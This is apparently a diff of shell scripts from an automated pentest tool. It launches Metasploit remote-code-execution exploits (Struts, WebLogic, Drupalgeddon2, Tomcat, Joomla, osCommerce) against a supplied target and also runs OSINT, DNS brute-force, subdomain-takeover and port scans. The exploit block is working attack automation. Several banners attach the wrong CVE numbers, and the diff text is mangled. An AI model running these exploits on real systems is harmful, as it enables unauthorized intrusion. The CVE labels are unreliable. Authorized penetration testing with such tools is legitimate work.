rm -f $LOOT_DIR/output/msf-$TARGET-port443-phpmyadmin_3522_backdoor.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING JOOMLA COMFIELDS SQL INJECTION METASPLOIT CVE-2017-8917 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use unix/webapp/joomla_comfields_sqli_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-joomla_comfields_sqli_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING WORDPRESS REST API CONTENT INJECTION CVE-2017-5612 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/wordpress_content_injection; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw > $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-wordpress_content_injection.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC WLS-WSAT DESERIALIZATION RCE CVE-2017-10271 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce; setg RHOST "$TARGET"; set RPORT 80; set SSL false; run; back;exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw > $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-oracle_weblogic_wsat_deserialization_rce.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS JAKARTA OGNL INJECTION CVE-2017-5638 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use multi/http/struts2_content_type_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_content_type_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 SHOWCASE OGNL RCE CVE-2017-9805 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_rest_xstream; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_rest_xstream.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 REST XSTREAM RCE CVE-2017-9791 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_code_exec_showcase; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_code_exec_showcase.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE TOMCAT CVE-2017-12617 RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/tomcat_jsp_upload_bypass; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw > $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-tomcat_jsp_upload_bypass.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING APACHE STRUTS 2 NAMESPACE REDIRECT OGNL INJECTION CVE-2018-11776 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/struts2_namespace_ognl; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw > $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-struts2_namespace_ognl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CISCO ASA TRAVERSAL CVE-2018-0296 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use auxiliary/scanner/http/cisco_directory_traversal; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw > $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-cisco_directory_traversal.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING DRUPALGEDDON2 CVE-2018-7600 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/unix/webapp/drupal_drupalgeddon2; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw > $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-drupal_drupalgeddon2.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING ORACLE WEBLOGIC SERVER DESERIALIZATION RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/misc/weblogic_deserialize; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw > $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-weblogic_deserialize.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING OSCOMMERCE INSTALLER RCE CVE-2018-2628 $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
msfconsole -q -x "use exploit/multi/http/oscommerce_installer_unauth_code_exec; setg RHOST "$TARGET"; setg RPORT "443"; set SSL true; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw > $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port443-oscommerce_installer_unauth_code_exec.raw 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
|
@ -1,7 +1,26 @@
|
|||
if [ "$OSINT" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$WHOIS" == "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null $RESET"
|
||||
fi
|
||||
whois $TARGET 2> /dev/null | tee $LOOT_DIR/osint/whois-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING OSINT INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python2.7 $THEHARVESTER -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$THEHARVESTER" == "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python2.7 $THEHARVESTER_PATH -d $TARGET -l 100 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null $RESET"
|
||||
fi
|
||||
theharvester -d $TARGET -l 25 -b all 2> /dev/null | tee $LOOT_DIR/osint/theharvester-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [ "$METAGOOFIL" == "1" ]; then
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null $RESET"
|
||||
fi
|
||||
metagoofil -d $TARGET -t doc,pdf,xls,csv,txt -l 25 -n 25 -o $LOOT_DIR/osint/ -f $LOOT_DIR/osint/$TARGET.html 2> /dev/null | tee $LOOT_DIR/osint/metagoofil-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -0,0 +1,24 @@
|
|||
if [ $SCAN_TYPE == "DOMAIN" ] && [ $OSINT == "1" ]; then
|
||||
if [ $OSINT == "0" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED SKIPPING OSINT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
else
|
||||
if [ $GOOHAK = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING GOOGLE HACKING QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
goohak $TARGET > /dev/null
|
||||
fi
|
||||
if [ $INURLBR = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING INURLBR OSINT QUERIES $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
php $INURLBR --dork "site:$TARGET" -s inurlbr-$TARGET | tee $LOOT_DIR/osint/inurlbr-$TARGET
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/osint/inurlbr-$TARGET > $LOOT_DIR/osint/inurlbr-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/osint/inurlbr-$TARGET
|
||||
rm -Rf output/ cookie.txt exploits.conf
|
||||
fi
|
||||
GHDB="1"
|
||||
fi
|
||||
fi
|
||||
|
|
@ -1,8 +1,4 @@
|
|||
if [ "$RECON" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING WHOIS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whois $TARGET
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS SUBDOMAINS VIA SUBLIST3R $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
|
|
@ -27,7 +23,7 @@ if [ "$RECON" = "1" ]; then
|
|||
echo -e "$OKRED BRUTE FORCING DNS SUBDOMAINS VIA DNSCAN (THIS COULD TAKE A WHILE...) $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$DNSCAN" = "1" ]; then
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_DEFAULT -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
python $PLUGINS_DIR/dnscan/dnscan.py -d $TARGET -w $DOMAINS_QUICK -o $LOOT_DIR/domains/domains-dnscan-$TARGET.txt -i $LOOT_DIR/domains/domains-ips-$TARGET.txt
|
||||
cat $LOOT_DIR/domains/domains-dnscan-$TARGET.txt 2>/dev/null | grep $TARGET| awk '{print $3}' | sort -u >> $LOOT_DIR/domains/domains-$TARGET.txt 2> /dev/null
|
||||
dos2unix $LOOT_DIR/domains/domains-$TARGET.txt 2>/dev/null
|
||||
fi
|
||||
|
|
@ -52,44 +48,29 @@ if [ "$RECON" = "1" ]; then
|
|||
sort -u /tmp/curl.out 2> /dev/null > $LOOT_DIR/domains/domains-$TARGET-full.txt
|
||||
rm -f /tmp/curl.out 2> /dev/null
|
||||
echo -e "$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
|
||||
echo ""
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING DOMAIN FLYOVER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
aquatone-discover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-discover 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-discover > $LOOT_DIR/nmap/aquatone-$TARGET-discover.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-discover 2> /dev/null
|
||||
aquatone-takeover -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-takeovers > $LOOT_DIR/nmap/aquatone-$TARGET-takeovers.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-takeovers 2> /dev/null
|
||||
aquatone-scan -d $TARGET -t 100 -p80,443 | tee $LOOT_DIR/nmap/aquatone-$TARGET-ports 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-ports > $LOOT_DIR/nmap/aquatone-$TARGET-ports.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-ports 2> /dev/null
|
||||
aquatone-gather -d $TARGET -t 100 | tee $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/aquatone-$TARGET-gather > $LOOT_DIR/nmap/aquatone-$TARGET-gather.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/aquatone-$TARGET-gather 2> /dev/null
|
||||
mkdir -p $LOOT_DIR/aquatone/ 2> /dev/null
|
||||
cp -Rf ~/aquatone/$TARGET $LOOT_DIR/aquatone/
|
||||
echo ""
|
||||
if [ "$SPOOF_CHECK" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR EMAIL SECURITY $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python $PLUGINS_DIR/spoofcheck/spoofcheck.py $TARGET | tee $LOOT_DIR/nmap/email-$TARGET.txt 2>/dev/null
|
||||
echo ""
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
dig $TARGET CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
for a in `cat $LOOT_DIR/domains/domains-$TARGET-full.txt`; do dig $a CNAME | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$a.txt 2>/dev/null; done;
|
||||
if [ "$SUBOVER" = "1" ]; then
|
||||
cd $PLUGINS_DIR/SubOver/
|
||||
python subover.py -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
|
||||
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/nmap/takeovers-$TARGET-subover 2> /dev/null
|
||||
cd $INSTALL_DIR
|
||||
fi
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd $PLUGINS_DIR/slurp/
|
||||
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
|
||||
if [ "$SLURP" = "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED STARTING PUBLIC S3 BUCKET SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
cd $PLUGINS_DIR/slurp/
|
||||
./slurp-linux-amd64 domain --domain $TARGET | tee $LOOT_DIR/nmap/takeovers-$TARGET-s3-buckets.txt 2>/dev/null
|
||||
fi
|
||||
fi
|
||||
226
modes/stealth.sh
226
modes/stealth.sh
|
|
@ -11,9 +11,6 @@ if [ "$MODE" = "stealth" ]; then
|
|||
if [ "$FULLNMAPSCAN" = "1" ]; then
|
||||
args="$args -fp"
|
||||
fi
|
||||
if [ "$GOOHAK" = "1" ]; then
|
||||
args="$args -g"
|
||||
fi
|
||||
if [ "$RECON" = "1" ]; then
|
||||
args="$args -re"
|
||||
fi
|
||||
|
|
@ -81,9 +78,14 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING DNS INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
dig all +short $TARGET > $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dig all +short -x $TARGET >> $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null
|
||||
dnsenum $TARGET 2> /dev/null
|
||||
dnsenum $TARGET 2> /dev/null | tee $LOOT_DIR/output/dnsenum-$TARGET.txt 2> /dev/null
|
||||
mv -f *_ips.txt $LOOT_DIR/domains/ 2>/dev/null
|
||||
|
||||
if [ $SCAN_TYPE == "DOMAIN" ];
|
||||
|
|
@ -91,6 +93,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR SUBDOMAIN HIJACKING $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i \"wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp\" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null$RESET"
|
||||
fi
|
||||
cat $LOOT_DIR/nmap/dns-$TARGET.txt 2> /dev/null | egrep -i "wordpress|instapage|heroku|github|bitbucket|squarespace|fastly|feed|fresh|ghost|helpscout|helpjuice|instapage|pingdom|surveygizmo|teamwork|tictail|shopify|desk|teamwork|unbounce|helpjuice|helpscout|pingdom|tictail|campaign|monitor|cargocollective|statuspage|tumblr|amazon|hubspot|cloudfront|modulus|unbounce|uservoice|wpengine|cloudapp" | tee $LOOT_DIR/nmap/takeovers-$TARGET.txt 2>/dev/null
|
||||
|
||||
source modes/osint.sh
|
||||
|
|
@ -103,6 +108,9 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED RUNNING TCP PORT SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt$RESET"
|
||||
fi
|
||||
nmap -sS -T5 --open -Pn -p $DEFAULT_PORTS $TARGET -oX $LOOT_DIR/nmap/nmap-$TARGET.xml | tee $LOOT_DIR/nmap/nmap-$TARGET.txt
|
||||
|
||||
port_80=`grep 'portid="80"' $LOOT_DIR/nmap/nmap-$TARGET.xml | grep open`
|
||||
|
|
@ -113,55 +121,102 @@ if [ "$MODE" = "stealth" ]; then
|
|||
echo -e "$OKRED + -- --=[Port 80 closed... skipping.$RESET"
|
||||
else
|
||||
echo -e "$OKORANGE + -- --=[Port 80 opened... running tests...$RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING HTTP INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
whatweb -a 3 http://$TARGET | tee $LOOT_DIR/web/whatweb-$TARGET-http 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/whatweb-$TARGET-http > $LOOT_DIR/web/whatweb-$TARGET-http.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED GATHERING SERVER INFO $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
python3 $PLUGINS_DIR/wig/wig.py -d -q -t 50 http://$TARGET | tee $LOOT_DIR/web/wig-$TARGET-http
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/wig-$TARGET-http > $LOOT_DIR/web/wig-$TARGET-http.txt 2> /dev/null
|
||||
if [ "$WAFWOOF" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
echo -e "$OKRED CHECKING FOR WAF $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
if [ "$VERBOSE" == "1" ]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http 2> /dev/null$RESET"
|
||||
fi
|
||||
wafw00f http://$TARGET | tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/web/waf-$TARGET-http.raw > $LOOT_DIR/web/waf-$TARGET-http.txt 2> /dev/null
|
||||
rm -f tee $LOOT_DIR/web/waf-$TARGET-http.raw 2> /dev/null
|
||||
fi
|
||||
if [ "$WHATWEB" == "1" ]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}"
|
||||
